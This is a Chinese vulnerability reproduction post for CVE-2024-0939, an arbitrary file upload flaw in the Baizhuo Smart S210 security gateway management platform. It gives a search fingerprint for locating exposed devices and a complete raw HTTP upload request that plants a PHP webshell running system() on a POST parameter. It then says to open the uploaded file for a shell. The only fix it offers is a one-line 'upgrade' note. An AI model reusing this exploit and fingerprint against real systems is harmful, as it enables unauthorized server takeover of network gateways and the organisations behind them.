免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
02
—
漏洞影响
Smart S210
03
—
漏洞描述
北京百卓网络技术有限公司有限公司(以下简称百卓网络)是一家致力于构建下一代安全互联网的高科技企业。百卓网络智能S210多业务安全网关智能管理平台存在任意文件上传漏洞。攻击者可以利用此漏洞获得服务器权限并操纵服务器文件。
04
—
title="Smart管理平台"
注意:搜到的资产可能无法用浏览器打开,这里有个诀窍:
-
打开虚拟机,centos或者kali都可以
-
在虚拟机中打开浏览器
-
在虚拟机的浏览器中打开url
-
点击高级->继续
05
—
漏洞复现
构造EXP并上传src.php文件
POST/Tool/uploadfile.php?HTTP/1.1Host: 192.168.40.130:8443Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887Content-Length: 405Origin: https://192.168.40.130:8443Referer: https://192.168.40.130:8443/Tool/uploadfile.phpUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: close-----------------------------13979701222747646634037182887Content-Disposition: form-data; name="file_upload"; filename="contents.php"Content-Type: application/octet-streamsystem($_POST["passwd"]);-----------------------------13979701222747646634037182887Content-Disposition: form-data; name="txt_path"/home/src.php-----------------------------13979701222747646634037182887--
访问/home/src.php获取webshell。
漏洞复现完成
06
—
批量漏洞扫描
考虑到资产访问的特殊性不想写POC了,对,这是小编脑海复现出的第一个借口~~
此时此刻提前回村过年的小编坐在登机口旁边的凳子上,望着登机口排起的长队陷入沉思,仓促写个POC大概率不完善,那与其写个不完美的POC还不如收工排队,免得最后上去行李架满了~~~
哪位小哥写好POC了私信小编一份,谢谢。
提前给您拜个早年:
在新的一年里,愿您分分秒秒平平安安,朝朝暮暮开开心心。日日夜夜健健康康,岁岁年年潇潇洒洒,时时刻刻风风光光。新的一年愿所有的好梦依偎着你!入睡是甜,醒来成真!
07
—
修复建议
升级到最新版本。
原文始发于微信公众号(AI与网安):CVE-2024-0939
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论